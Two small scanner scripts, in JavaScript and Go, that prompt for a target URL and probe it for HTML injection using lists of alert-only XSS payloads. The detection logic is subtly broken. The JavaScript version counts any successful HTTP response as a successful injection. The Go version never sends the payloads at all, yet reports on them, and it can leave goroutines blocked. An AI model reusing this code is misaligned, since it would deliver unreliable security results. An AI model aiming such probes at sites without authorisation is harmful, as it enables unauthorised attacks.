File: hacking_with_javascript/html_injection.js
const fetch = require('node-fetch');
const readline = require('readline');

// Function to test injection on input fields
async function testInputFields(websiteURL, payloads) {
    for (const payload of payloads) {
        try {
            const formData = new URLSearchParams();
            formData.append('inputField', payload);

            // Test injection using POST method
            const postResponse = await fetch(websiteURL, {
                method: 'POST',
                body: formData
            });

            if (postResponse.ok) {
                console.log(`\x1b[32mInjection successful with payload: ${payload}\x1b[0m`); // Green color for success
            } else {
                console.error(`\x1b[31mInjection failed with payload: ${payload}\x1b[0m`); // Red color for error
            }
        } catch (error) {
            console.error('\x1b[31mError:\x1b[0m', error); // Red color for error
        }
    }
}

// Function to perform the injection test
async function testInjection(websiteURL) {
    // List of payloads to inject
    const payloads = [
        '<script>alert("Injected!")</script>',
        '<img src="invalid-image" onerror="alert(\'Injected!\')">',
        '<svg/onload=alert("Injected!")>',
        '<a href="javascript:alert(\'Injected!\')">Click Me</a>',
        '"><script>alert("Injected!")</script><"',
        '"><img src="invalid-image" onerror="alert(\'Injected!\')" /><"',
        '"\'><svg/onload=alert("Injected!")>',
        '"\'><a href="javascript:alert(\'Injected!\')">Click Me</a>',
        // Add more payloads as needed
    ];

    try {
        console.log(`Testing injection on ${websiteURL} ...`);

        // Test injection on input fields
        await testInputFields(websiteURL, payloads);

        console.log('\x1b[32mInjection testing completed.\x1b[0m'); // Green color for success
    } catch (error) {
        console.error('\x1b[31mError:\x1b[0m', error); // Red color for error
    }
}

// Read user input from command line
const rl = readline.createInterface({
    input: process.stdin,
    output: process.stdout
});

// Ask the user to provide the target website URL
rl.question('Enter your target website URL: ', (websiteURL) => {
    // Call the function to perform the injection test with the provided website URL
    testInjection(websiteURL);
    rl.close();
});

File: hacking_with_go/html_injection.go
package main

import (
    "bufio"
    "fmt"
    "io/ioutil"
    "net/http"
    "os"
    "strings"
    "sync"
)

func main() {
    // Prompt the user to enter the target website URL
    fmt.Print("Enter your target website URL: ")
    reader := bufio.NewReader(os.Stdin)
    url, err := reader.ReadString('\n')
    if err != nil {
        fmt.Println("Error reading input:", err)
        return
    }
    url = strings.TrimSpace(url)

    // Payloads to inject - Modify and add more payloads as per your testing needs
    payloads := []string{
        "<script>alert('Vulnerable!');</script>",
        "<img src=x onerror=alert('Vulnerable!')>",
        "<svg/onload=alert('Vulnerable!')>",
        "<body onload=alert('Vulnerable!')>",
        "<marquee onstart=alert('Vulnerable!')>Test</marquee>",
        "<div style=\"display:none\" onload=alert('Vulnerable!')></div>",
        "<iframe src=\"javascript:alert('Vulnerable!');\"></iframe>",
        "<input type=\"image\" src=\"javascript:alert('Vulnerable!');\">",
        "<object data=\"javascript:alert('Vulnerable!');\"></object>",
        "<plaintext><script>alert('Vulnerable!');</script></plaintext>",
    }

    // Channel to receive results from Goroutines
    results := make(chan bool)

    // WaitGroup to wait for Goroutines to finish
    var wg sync.WaitGroup

    // Send concurrent requests with different payloads
    for _, payload := range payloads {
        wg.Add(1)
        go func(payload string) {
            defer wg.Done()

            // Send a GET request to the target URL
            resp, err := http.Get(url)
            if err != nil {
                fmt.Printf("Error sending GET request with payload %q: %v\n", payload, err)
                results <- false
                return
            }
            defer resp.Body.Close()

            // Read the response body
            bodyBytes, err := ioutil.ReadAll(resp.Body)
            if err != nil {
                fmt.Printf("Error reading response body with payload %q: %v\n", payload, err)
                results <- false
                return
            }

            // Convert response body to string
            responseBody := string(bodyBytes)

            // Check if the payload is present in the response body
            if strings.Contains(responseBody, payload) {
                fmt.Printf("Vulnerable to HTML injection with payload: %q\n", payload)
                results <- true
            } else {
                results <- false
            }
        }(payload)
    }

    // Close the channel when all Goroutines are done
    go func() {
        wg.Wait()
        close(results)
    }()

    // Check results from Goroutines
    vulnerable := false
    for result := range results {
        if result {
            vulnerable = true
            break
        }
    }

    if !vulnerable {
        fmt.Println("Not vulnerable to HTML injection.")
    }
}
